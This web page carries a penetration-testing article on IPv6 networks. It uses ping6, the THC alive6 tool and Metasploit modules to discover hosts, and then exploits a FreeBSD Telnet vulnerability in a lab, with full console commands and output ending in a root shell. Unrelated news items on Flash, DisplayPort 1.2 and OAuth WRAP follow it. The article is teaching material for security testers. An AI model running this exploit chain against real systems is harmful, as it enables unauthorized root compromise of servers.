Pen testing on IPv6 networks: In Through the Back Door
IPv6 Pen Testing
By Michael Messner
If you have enabled IPv6 on your network without considering basic security issues, you might have opened up a hole for attackers. In this article, we demonstrate a successful attack on a server via IPv6 and explain how the popular security tools handle IPv6.
Although the “next generation” IPv6 Internet protocol can already look back on more than 10 years of history, many companies are only now starting to migrate to the new version. Some experts have already begun to point out that IPv6 security has some unexpected complications for admins who are accustomed to IPv4 networks. One such under-mentioned problem is the need to lock down or turn off IPv6 services that might be running on an IPv4 or a dual IPv4/IPv6 network. Some modern systems enable IPv6 by default. Even if your network is primarily focused on IPv4, it is a good idea to pay some special attention to IPv6 in your pen testing. You might discover that your systems are vulnerable to exploits in IPv6 that aren’t available (or don’t appear) through conventional IPv4 pen tests.
In this article, I take a brief look at some IPv6 testing modules available through the Metasploit framework. In this case, I set up a scenario for my tests within our security testing lab; however, these techniques will help you search out other exploits hidden on your transitional IPv4/IPv6 mixed network.
Looking Around
All recent operating systems are capable of using the IPv6 protocol and often enable it by default. On Linux, you can verify that IPv6 is enabled with a simple test using  ifconfig or ip (Listing 1). The output for the interface configuration should contain at least one inet6 entry. If an IPv6-enabled router exists on the internal network, the system might already be configured with a global address in addition to the link-local address.
Listing 1: ifconfig and ip
01 [email protected]:~# ifconfig -a
02 eth0      Link encap:Ethernet  HWaddr 00:0c:29:7c:e7:6a
03           inet addr:192.168.11.138  Bcast:192.168.11.255  Mask:255.255.255.0
04           inet6 addr: fe80::20c:29ff:fe7c:e76a/64 Scope:Link
05 […]
06 [email protected]:~# ip -6 addr
07 […]
08 1: lo:  mtu 16436





09     inet6 ::1/128 scope host





10        valid_lft forever preferred_lft forever





11 […]





12 2: eth0:  mtu 1500 qlen 1000





13     inet6 fe80::20c:29ff:fecf:6aba/64 scope link





14        valid_lft forever preferred_lft forever





The presence of an inet6 entry doesn’t automatically mean the computer is accessible from external addresses. The scope link in line 4 of Listing 1 means that the address is only used on the local subnet; it is not routed beyond router or network boundaries. Listing 2 shows what the configuration looks like when the network contains an IPv6-capable router.





Listing 2: Global Scope





inet6 addr: 2001:4dd0:fd42:3:20c:29ff:fe7c:e76a/64 Scope:Global**





[…]





inet6 addr: fd44:2011:1021:0:20c:29ff:fe7c:e76a/64 Scope:Global**





[…]





inet6 addr: fe80::20c:29ff:fe7c:e76a/64 Scope:Link**





A simple test of the IPv6 functions is to ping6 to the loopback interface:





[email protected]:~# ping6 ::1 -c1





PING ::1(::1) 56 data bytes





64 bytes from ::1: icmp_seq=1 ttl=255 time=0.052 ms





— ::1 ping statistics —





1 packets transmitted, 1 received, 0% packet loss, time 0ms





rtt min/avg/max/mdev = 0.052/0.052/0.052/0.000 ms





Just as with IPv4, you can ping the broadcast address (in IPv6, this is FF02::1; all the systems on the local network respond to this). Consequently, the following simple command already offers an initial overview of the local network:





[email protected]:~# ping6 ff02::1%2 | cut -d\  -f4





fe80::20c:29ff:fecf:6aba:





fe80::20c:29ff:fe5c:e4b6:





fe80::20c:29ff:fef5:b6b0:





fe80::20c:29ff:fe01:95e3:





[…]




 
If you sort the output, remove duplicate entries with uniq, and redirect the results to a text file, you already have a good basis for further analysis.
IPv6 and Metasploit
Many well-known analysis tools are now ready to work with IPv6 systems. You can use Nessus, Nmap, and Wireshark to analyze IPv6-capable networks. Alive6, for instance, offers several tools for analyzing possible IPv6 vulnerabilities (see the sidebar titled “Alive6”). In this article, however, I will focus on Metasploit.

 
Listing 3: THC IPv6 Attack Toolkit
[email protected]:~# wget http://www.thc.org/releases/thc-ipv6-1.8.tar.gz
[email protected]:~# tar xzf thc-ipv6-1.8.tar.gz
[email protected]:~# cd thc-ipv6-1.8
[email protected]:~# apt-get install libssl-dev
[email protected]: ~/thc-ipv6-1.8# make
[email protected]:~/thc-ipv6-1.8# ./alive6 eth0
Warning: unprefered IPv6 address had to be selected
Alive: fe80::20c:29ff:feec:1a8d
Alive: fe80::20c:29ff:fef5:b6b0
Alive: fe80::20c:29ff:fed9:71ca
Alive: fe80::20c:29ff:fe49:51bf
Alive: fe80::20c:29ff:fe46:8180
[…]
Found 19 systems alive
It is not surprising that the Metasploit penetration testing toolset is already largely IPv6 capable. Most auxiliary modules and exploits also work on IPv6-capable networks. Metasploit also includes a variety of IPv6 payloads and a number of special auxiliary modules for IPv6.
If you are new to Metasploit, a number of introductory articles are available at the Linux Magazine and ADMIN websites. In this article, I assume you have some familiarity operating from Metasploit’s msfconsole command-line interface.
Listing 4 shows how you can use the search command at the Metasploit console to find existing IPv6 modules.
Listing 4: search type:auxiliary ipv6
10.8.28.2 - (Sessions: 0 Jobs: 0)> search type:auxiliary ipv6
   Name
   —-
   auxiliary/scanner/discovery/ipv6_multicast_ping
   auxiliary/scanner/discovery/ipv6_neighbor
   auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
The three modules found in Listing 4 are suitable for scanning local IPv6 networks, as well as IPv4 networks. A typical approach is first to try ipv6_multicast_ping and then use ipv6_neighbor, which determines the corresponding IPv4 addresses for systems found.
Because IPv6 has several multicast addresses, you can target all routers with the destination address ff0X<_2 where="where" x="x" stands="stands" for="for" the="the" possible="possible" scope="scope" which="which" can="can" have="have" following="following" br="values:br"> ff01::2 All routers in interface-local





ff02::2 All routers in link-local





ff05::2 All routers in site-local





Use the ipv6_multicast_ping module to send an ICMP request to the IPv6 multicast addresses and discover the existing systems that listen on IPv6 addresses (Listing 5).





Listing 5: ipv6_multicast_ping





10.8.28.2 - (Sessions: 0 Jobs: 0)> use auxiliary/scanner/discovery/ipv6_multicast_ping





10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(ipv6_multicast_ping) > show options

Module options (auxiliary/scanner/discovery/ipv6_multicast_ping):

   Name       Current Setting  Required  Description
   —-       —————  ——–  ———–
   INTERFACE                   no        The name of the interface
   SHOST                       no        The source IPv6 address
   SMAC                        no        The source MAC address
   TIMEOUT    5                yes       Timeout when waiting for host response.

10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(ipv6_multicast_ping) > run

[*] [2012.02.03-16:11:02] Sending multicast pings…
[*] [2012.02.03-16:11:07] Listening for responses…
[*] [2012.02.03-16:11:09]    |*| fe80::20c:29ff:fe4c:2f4d => 00:0c:29:4c:2f:4d
[…]
[*] Auxiliary module execution completed
The ipv6_neighbor module is designed for analysis on the local subnet. It tries to use the ARP protocol to discover active IPv4 addresses and then identifies corresponding IPv6 addresses for the systems. This process gives you a simple mapping between identified services and vulnerabilities between IPv4 and IPv6 traffic class addresses (Listing 6).
Listing 6: ipv6_neighbor
10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(ipv6_neighbor) > show options

Module options (auxiliary/scanner/discovery/ipv6_neighbor):

   Name       Current Setting    Required  Description
   —-       —————    ——–  ———–
   INTERFACE  eth0               no        The name of the interface
   RHOSTS     10.8.28.0/24       yes       The target address range or CIDR
   SHOST                         no        Source IP Address
   SMAC       00:0c:29:cf:6a:ba  yes       Source MAC Address
   THREADS    15                 yes       The number of concurrent threads
   TIMEOUT    500                yes       The number of seconds to wait

10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(ipv6_neighbor) > set SHOST 10.8.28.2
SHOST => 10.8.28.2
ru10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(ipv6_neighbor) > run

[*] [2012.02.03-16:13:11] Discovering IPv4 nodes via ARP…
[*] [2012.02.03-16:13:11]          10.8.28.3 ALIVE
[*] [2012.02.03-16:13:12]          10.8.28.4 ALIVE
[…]
[*] [2012.02.03-16:13:58] Discovering IPv6 addresses for IPv4 nodes…
[*] [2012.02.03-16:13:58]
[*] [2012.02.03-16:13:59]          10.8.28.3 maps to fe80::20c:29ff:fe68:a4d2
[*] [2012.02.03-16:14:00]          10.8.28.7 maps to fe80::20c:29ff:fe85:c24b
[…]
[*] Auxiliary module execution completed
The results obtained by this module are dumped by Metasploit into its own database below notes. Typing
host.ipv4.ipv6.mapping
filters the results.
Port Scan
You can also use Metasploit for a simple port scan (Listing 7).
Listing 7: Metasploit Portscan
10.8.28.2 - (Sessions: 0 Jobs: 0)> use auxiliary/scanner/portscan/tcp

10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(tcp) > set RHOSTS fe80::20c:29ff:fe4c:2f4d
10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(tcp) > set PORTS ”7,21,22,23,25,43,50,





10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(tcp) > set THREADS 50





10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(tcp) > run

[*] [2012.02.03-16:54:50] fe80::20c:29ff:fe4c:2f4d:53 - TCP closed
[*] [2012.02.03-16:54:50] fe80::20c:29ff:fe4c:2f4d:23 - TCP OPEN
[*] [2012.02.03-16:54:50] fe80::20c:29ff:fe4c:2f4d:50 - TCP closed
[*] [2012.02.03-16:54:50] fe80::20c:29ff:fe4c:2f4d:25 - TCP closed
Use the show options, set, use, RHOST, LHOST, and run commands to discover the target hosts and services. Metasploit adds them to its database, where you can quickly retrieve them using services.
In Listing 7, notice that Metasploit has uncovered a system that has left port 23 open. TCP port 23 corresponds to Telnet. You can then scan the Telnet port on a server, using services -p 23 -R and run, and Metasploit returns some information about the system:
fe80::20c:29ff:fe4c:2f4d 23 tcp telnet open FreeBSD/i386 (freebsd73.pwnme) (ttyp0)\x0d\x0a\x0d\x0alogin:
The BSD server used here has a vulnerability in its Telnet service that allows attackers to gain unauthorized root access without a password. Although the developers have patched this vulnerability in the meantime, the bug is still there in the original image – and also in many appliances based on BSD.
In the simplest case, select the required auxiliary module with use, and then run set rhosts to configure the IPv6 destination address. Finally, typing run triggers the scanning process (see Listing 8).
Listing 8: Identifying Vulnerabilities
10.8.28.2 - (Sessions: 0 Jobs: 0)> use auxiliary/scanner/telnet/telnet_encrypt_overflow
10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(telnet_encrypt_overflow) > set RHOSTS fe80::20c:29ff:fe4c:2f4d
RHOSTS => fe80::20c:29ff:fe4c:2f4d
10.8.28.2 - (Sessions: 0 Jobs: 0) auxiliary(telnet_encrypt_overflow) > run

[+] [2012.02.03-16:40:26] fe80::20c:29ff:fe4c:2f4d:23 VULNERABLE: FreeBSD/i386 (free.pwnme) (ttyp0)\x0d\x0a\x0d\x0alogin:
[*] [2012.02.03-16:40:26] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
A Successful Attack
The module confirms vulnerability. You can now run an exploit with an IPv6 bind payload against the IPv6 target address. The show payloads command shows compatible payloads for this exploit; you need to select one. On the local network only (Scope:Link), the IPv6 Reverse payload is of limited use because the attacker would need to specify the scope ID or the local interface of the target system. However these settings cannot normally be determined over the network. To finally start the attack, use set PAYLOAD bsd/x86/shell/bind_ipv6_tcp and exploit, which culminates in a root shell on the server (Listing 9).
Listing 9: Root Exploit Against Telnet on IPv6
10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > set PAYLOAD bsd/x86/shell/bind_ipv6_tcp
PAYLOAD => bsd/x86/shell/bind_ipv6_tcp
10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > show options

Module options (exploit/freebsd/telnet/telnet_encrypt_keyid):
   Name      Current Setting           Required  Description
   —-      —————           ——–  ———–
   PASSWORD                            no        The password
   RHOST     fe80::20c:29ff:fe4c:2f4d  yes       The target address
   RPORT     23                        yes       The target port
   USERNAME                            no        The username to authenticate

Payload options (bsd/x86/shell/bind_ipv6_tcp):
   Name   Current Setting           Required  Description
   —-   —————           ——–  ———–
   LPORT  4444                      yes       The listen port
   RHOST  fe80::20c:29ff:fe4c:2f4d  no        The target address

Exploit target:
   Id  Name
   –  —-
   0   Automatic

10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > exploit
[*] [2012.02.03-16:29:56] Started bind handler
[*] [2012.02.03-16:29:56] Brute forcing with 9 possible targets
[*] [2012.02.03-16:29:56] Trying target FreeBSD 8.2…
[*] [2012.02.03-16:29:56] FreeBSD/i386 (free.pwnme) (ttyp0)\x0d\x0a\x0d\x0alogin:






[*] [2012.02.03-16:30:00] Sending first payload





[*] [2012.02.03-16:30:01] Sending second payload…





[*] [2012.02.03-16:30:01] Sending stage (46 bytes) to fe80::20c:29ff:fe4c:2f4d





[*] [2012.02.03-16:30:01] Trying target FreeBSD 7.0/7.1/7.2…





[*] Command shell session 1 opened (fe80::20c:29ff:fecf:6aba%eth0:45801 -> fe80::20c:29ff:fe4c:2f4d%eth0:4444) at 2012-02-03 16:30:02 +0100





id





uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)





Conclusion





An exploit against the Telnet service on the IPv6 address was successful; the attacker has root privileges on the server. Just to remind you: this example shows how a system that has no services and no vulnerabilities on its IPv4 address can be attacked and completely compromised via IPv6.





Info





[1] THC IPV6 attack toolkit





Author





Michael Messner works as a Senior IT Security Consultant with Integralis Deutschland GmbH, where he performs technical security analyses and penetration testing for renowned German companies. He is also a Metasploit Trainer and the author of the comprehensive Metasploit book, Metasploit – Guide to the Penetration Testing Framework.











 





Comments





In the US and Canada, Linux Magazine is known as Linux Pro Magazine.

© 2013 Linux New Media USA, LLC

 892 total views

gbutler69 writes “Someone has gone and done it. Tobias Schneider has created a Flash player written in JavaScript targeting SVG/HTML5-capable browsers. It’s not a complete implementation yet, but it shows real promise. A few demos have been posted online. How long before HTML5/SVG next-generation browsers like Chrome, Firefox, Opera, Safari, Epiphany, and other Web-Kit based browsers completely supplant Flash and Silverlight/Moonlight?”

Read more of this story at Slashdot.


 814 total views

The Video Electronics Standards Association has codified the standard for the next version of DisplayPort, and the small, Apple-loving HDMI competitor, and it just got a lot more interesting. Like, multiple-monitors-on-one-plug interesting.

The concept of daisy-chaining multiple monitors on one DisplayPort connection has been part of the vision all along, but version 1.2 will be the first to actually support the technology—at this stage, up to four at a time, at a resolution of 1920 x 1200. On top of that, it’ll bring full HD, 120fps-per-channel 3D support, a 21.6Gbps data rate, and bi-directional USB data, meaning that anything connected to a DisplayPort 1.2 cable could serve as a high-bandwidth USB hub.

And of course, VESA’s already accepted Apple’s miniaturized version of the port into the DisplayPort family and audio support is still present—albeit not in Apple’s variant. In other words, no, the battle isn’t settled, and HDMI hasn’t won—even forthcoming HDMI 1.4 hardware can’t hang with the next generation of DisplayPort hardware, if anyone decides to actually make it. [PC Authority]

Milpitas, Calif., Jan. 18, 2010 — The Video Electronics Standards Association (VESA) today formally unveiled the industry’s most innovative and flexible digital communication interface standard for transporting display, audio and other data.

VESA’s DisplayPort Version 1.2 is a comprehensive extension to the original DisplayPort standard offering many new benefits to the end user. Benefits include: double the data rate of the previous DisplayPort v1.1a standard (enabling higher performance 3D stereo displays, higher resolutions and color depths, and fastest refresh rates); multiple monitor support from a desktop or notebook computer using only one DisplayPort connector; the ability to transport USB data between a PC and Display, supporting Display USB functions such as a webcam and USB hub. DisplayPort v1.2 is backward compatible with existing DisplayPort v1.1a systems, including existing cables and the Mini DisplayPort connector.

DisplayPort v1.2 increases performance by doubling the maximum data transfer rate from 10.8 Gbps (Giga-bits-per-second) to 21.6 Gbps, greatly increasing display resolution, color depths, refresh rates, and multiple display capabilities.

DisplayPort v1.2 supports “multi-streaming” — the ability to transport multiple independent uncompressed display and audio streams over a single cable, supporting protected content and high performance applications such as 3D gaming. This enables the use of multiple monitors connected by cable in a daisy chain or hub configuration. Whereas the current Display v1.1a standard can support one 2560 x 1600 monitor at 60Hz, DisplayPort v1.2 can support two such monitors with one cable, or four 1920 x 1200 monitors. Many other combinations are possible, including multiple video sources, multiple displays (even at different resolutions) and multiple audio speakers.

Another new feature is the ability to support high-speed, bi-directional data transfer, allowing USB 2.0 or Ethernet data to be carried within a standard DisplayPort cable. For DisplayPort v1.2, the maximum data rate of this “AUX” channel has been increased from 1 Mbps (Mega-bit-per-second) to 720 Mbps, providing suitable bandwidth for USB 2.0. The DisplayPort cable can therefore support USB data to/from the display to support Display USB functions, in addition to sending the video and audio information. Standard Ethernet can also be transported in the DisplayPort cable.

DisplayPort v1.2 was designed to be compatible with existing DisplayPort systems and cables. To take advantage of the new capabilities, a PC will need to be DisplayPort v1.2 enabled, however existing standard cables can still be used, including those with the new Mini-DisplayPort connector. To achieve the 21.6 Gbps rate, the per-lane data rate is doubled from 2.7 Gbps to 5.4 Gbps, over the four lanes that exist in the standard cable. For a single display, this enables up to 3840 x 2400 resolution at 60Hz, or a 3D display (120Hz) at 2560 x 1600.

DisplayPort v1.2 also adds new audio enhancements including the following:
— Audio Copy Protection and category codes
— High definition audio formats such as Dolby MAT, DTS HD, all Blu-Ray
formats, and the DRA standard from China
— Synchronization assist between audio and video, multiple audio channels, and
multiple audio sink devices using Global Time Code (GTC)

DisplayPort v1.2 also includes improved support for Full HD 3D Stereoscopic displays:
— Life-like motion using up to 240 frames-per-second in full HD, providing 120
frames-per-second for each eye
— 3D Stereo transmission format support
Field sequential, side by side, pixel interleaved, dual interface, and stacked
— 3D Stereo display capability declaration
Mono, Stereo, 3D Glasses

“DisplayPort is a truly open, flexible, extensible multimedia interconnect standard that is ubiquitous in the PC, notebook and display markets and is rapidly gaining traction in consumer electronics applications,” said Bill Lempesis, VESA’s executive director. “DisplayPort Version v1.2 offers a complete set of benefits and capabilities that no other standard can provide. It is completely backward compatible with DisplayPort v1.1a and requires no new cables or other equipment, making it the standard of choice across the industry.






 970 total views

LinuxSecurity.com: The developers behind the OAuth protocol have developed a new variant called OAuth WRAP that is simpler and easier to implement. It’s a stop-gap solution that will enable broader OAuth adoption while OAuth 2.0, the next generation of the specification, is devised by a working group that is collaborating through the Internet Engineering Task Force (IETF).

 935 total views,  1 views today